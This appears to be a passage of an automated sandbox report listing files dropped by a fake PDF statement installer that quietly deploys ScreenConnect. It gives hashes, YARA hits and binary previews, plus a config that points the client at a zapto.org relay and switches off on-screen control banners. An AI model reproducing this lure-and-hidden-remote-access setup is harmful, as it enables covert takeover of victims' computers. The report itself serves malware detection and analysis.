                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                          Category:dropped
                                          Size (bytes):842248
                                          Entropy (8bit):6.268561504485627
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:BE74AB7A848A2450A06DE33D3026F59E
                                          SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                          SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                          SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...|..............@..B................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):81696
                                          Entropy (8bit):5.862223562830496
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                          SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                          SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                          SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):266
                                          Entropy (8bit):4.842791478883622
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:728175E20FFBCEB46760BB5E1112F38B
                                          SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                          SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                          SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1970
                                          Entropy (8bit):4.690426481732819
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:2744E91BB44E575AD8E147E06F8199E3
                                          SHA1:6795C6B8F0F2DC6D8BD39F9CF971BAB81556B290
                                          SHA-256:805E6E9447A4838D874D84E6B2CDFF93723641B06726D8EE58D51E8B651CD226
                                          SHA-512:586EDC48A71FA17CDF092A95D27FCE2341C023B8EA4D93FA2C86CA9B3B3E056FD69BD3644EDBAD1224297BCE9646419036EA442C93778985F839E14776F51498
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:XML 1.0 document, ASCII text, with very long lines (459), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):949
                                          Entropy (8bit):5.776097123776163
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:E16B6371C6F4FDAB54351877B8435843
                                          SHA1:57A129663247DD57EEF560F78F48FEF5AC9AC7CE
                                          SHA-256:22AFA6C2B784B02D8403A8773FE7730F9FF1C643295F811F1CB11AED2CD08133
                                          SHA-512:7C9B93E6E2CC99AE78115A846C6C24E0187FF59641C10F5E4C6EF718DFB4D09385E19967141F8F1A1D7025CF41F0D2D80B9A4FD2F490B8EC94EE1E0BFE267862
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=tmqw21a.zapto.org&amp;p=8041&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                          Category:dropped
                                          Size (bytes):1086792
                                          Entropy (8bit):7.793516535218678
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:30CA21632F98D354A940903214AE4DE1
                                          SHA1:6C59A3A65FB8E7D4AD96A3E8D90E72B02091D3F4
                                          SHA-256:4BB0E9B5C70E3CAEB955397A4A3B228C0EA5836729202B8D4BA1BE531B60DAFC
                                          SHA-512:47509F092B089EB1FFC115643DCDFBFAC5F50F239DE63ECAD71963EC1D37FF72B89F5A2AEA137ED391BA9BA10947ABBE6103DB1C56032FD6B39A0855CB283509
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):234
                                          Entropy (8bit):4.977464602412109
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                          SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                          SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                          SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>
                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):4.62694170304723
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                          SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                          SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                          SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):36864
                                          Entropy (8bit):4.340550904466943
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                          SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                          SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                          SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):57344
                                          Entropy (8bit):4.657268358041957
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                          SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                          SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                          SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):176128
                                          Entropy (8bit):5.775360792482692
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                          SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                          SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                          SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):11776
                                          Entropy (8bit):5.267782165666963
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5060FA094CE77A1DB1BEB4010F3C2306
                                          SHA1:93B017A300C14CEEBA12AFBC23573A42443D861D
                                          SHA-256:25C495FB28889E0C4D378309409E18C77F963337F790FEDFBB13E5CC54A23243
                                          SHA-512:2384A0A8FC158481E969F66958C4B7D370BE4219046AB7D77E93E90F7F1C3815F23B47E76EFD8129234CCCB3BCAC2AA8982831D8745E0B733315C1CCF3B1973D
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m............." ..0..&..........&E... ...`....... ..............................t.....@..................................D..O....`..............................$D..8............................................ ............... ..H............text...,%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H........'.......................C........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s.......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%......(...+%-.&+.(...........s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o
                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):1721856
                                          Entropy (8bit):6.639136400085158
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:9F823778701969823C5A01EF3ECE57B7
                                          SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                          SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                          SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                          Process:C:\Users\user\Downloads\Monthly_eStatementsForumdownloaded537090855311_PDF.ClientSetup.exe
                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {99E26C3F-C825-FDD0-DEE6-42CC1FB5697B}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                          Category:dropped
                                          Size (bytes):13336576
                                          Entropy (8bit):7.968421738724259
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:A16ED71FED5C5550E9CD42A72CC5B818
                                          SHA1:332448682E2C132735F2BD6754D11B4FE5936240
                                          SHA-256:04FD5115AA2EAB34E76A1947052AE505C589CD0E86C88A208F82514608187BF7
                                          SHA-512:D7ABF3E6260248EB31E16990AD116F227CF3099854D8565F39504EBD49CA2069888C59FB2EA80B86C6DA4AD07A389812FD6A073E9162CDE75B45AB61AD61A7BB
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:......................>.......................................................{...b...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):16151
                                          Entropy (8bit):6.481390438746775
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:C99603CFF45577C5EB8DA3ABD2C88051
                                          SHA1:67EEF493E2DAE77892B56B58BFE56E448B454DF4
                                          SHA-256:F7854A3A43CC5F18EBEE62FF1EAC4761257AEAF5266F152D2E24AEB850A52D3B
                                          SHA-512:69881638D7D4232C551D65F1379FD54CA99245A63DA0BAF2C3F2CA50E96C02BE5ED499EEB3F0CE087F2F18041D3BF88AAF519E98F6C224BE5CF5BAB3333CB742
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!......S...................@...........................T.......T...@..................................)..P....`...0S..........bT..i....T..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc....0S..`...2S.. ..............@..@.reloc........T......RT.............@..B................................................................................................................................................................................................................................................................................................
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):0
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:BC18A1EC3E55E1646E34A755AB33F245
                                          SHA1:6F91973E5DE37E803520F2135946BFDFEF003FC5
                                          SHA-256:AC0FD6FEC6042890E328E3085B6718057186CE5A0FD9F86F2B37F5D252D5DAB7
                                          SHA-512:7255C2913C0D3C98B36627C8CBF02B767FFF3F1C13F8FC33C2D40B7D50D084E0840ED75A08E74DA62631F4F95EF83EF30E07B80D66BA3F0DA81016046C8B2251
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!......S...................@...........................T.......T...@..................................)..P....`...0S..........bT..i....T..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc....0S..`...2S.. ..............@..@.reloc........T......RT.............@..B................................................................................................................................................................................................................................................................................................
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):5622768
                                          Entropy (8bit):7.426032599487788
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:BC18A1EC3E55E1646E34A755AB33F245
                                          SHA1:6F91973E5DE37E803520F2135946BFDFEF003FC5
                                          SHA-256:AC0FD6FEC6042890E328E3085B6718057186CE5A0FD9F86F2B37F5D252D5DAB7
                                          SHA-512:7255C2913C0D3C98B36627C8CBF02B767FFF3F1C13F8FC33C2D40B7D50D084E0840ED75A08E74DA62631F4F95EF83EF30E07B80D66BA3F0DA81016046C8B2251
                                          Malicious:false
                                          Yara Hits:
                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\Unconfirmed 701254.crdownload, Author: Joe Security
                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\Unconfirmed 701254.crdownload, Author: Joe Security
                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\Unconfirmed 701254.crdownload, Author: Joe Security
                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\Unconfirmed 701254.crdownload, Author: Joe Security
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!......S...................@...........................T.......T...@..................................)..P....`...0S..........bT..i....T..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc....0S..`...2S.. ..............@..@.reloc........T......RT.............@..B................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):423834
                                          Entropy (8bit):6.577403179557394
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:D8287567B3303E17DBD971AFDA3977FB
                                          SHA1:61F7B1290E039FB5E0090BA5BE03393FF12097AF
                                          SHA-256:4C4BC6CC6CF526E87774DA38C82AD1D37B04D59DBE8635F0BA69ADAD935AA05F
                                          SHA-512:8F3A94AA20B0DABCFCDE9EE97C793524CA9C977335659B4341B43309158645D8BFA74168B9752F2182A33E607183769B96529AD68790C48F08D4E5D998264992
                                          Malicious:false
                                          Yara Hits:
                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI719A.tmp, Author: Joe Security
                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI719A.tmp, Author: Joe Security
                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI719A.tmp, Author: Joe Security
                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI719A.tmp, Author: Joe Security
                                          Reputation:unknown
                                          Preview:...@IXOS.@.....@..zY.@.....@.....@.....@.....@.....@......&.{99E26C3F-C825-FDD0-DEE6-42CC1FB5697B}'.ScreenConnect Client (e6cb77284cf765aa)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{99E26C3F-C825-FDD0-DEE6-42CC1FB5697B}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (e6cb77284cf765aa)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{F7DC6ACE-2599-29C8-925C-5B3ACC994D1F}^.C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{E75F3825-615D-A6C3-18A8-A81116BE1B2A}f.C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{1D30660B-8729-B08B-2523-3D6361F833F5}c.C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe.@.......@.
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):207360
                                          Entropy (8bit):6.573348437503042
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                          SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                          SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                          SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:Composite Document File V2 Document, Cannot read section info
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):1.1614685388955261
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:4484F92BCB65974A6157694A9F3EB079
                                          SHA1:BC598E2C9DF19594F2DEA9E9C7F956A79F35363F
                                          SHA-256:ABB1A52A1FE0C231F95543FD253E4434E330A1A42348084CD4D662C27FCB455D
                                          SHA-512:101A270959A70F69AE3E9C371637DE7B7943DDA75CE94156DBB7FEEB6C071EA38064DA8D88A0B3E6F790E8ECAA1A79E1AE26F83D118889C89E2771DE9EDF4F44
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\msiexec.exe
                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):454234
                                          Entropy (8bit):5.3561760708880675
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:87825254703C7F6C5CDAE02CC91D8FB9
                                          SHA1:213CB37705E22A1D99AF3E725C5B8AC7CADB814C
                                          SHA-256:FAB4FC938C29828BC45D0D9B312C9B01F3FE0B2B690CBBC56F1D2B05B4FAA8CF
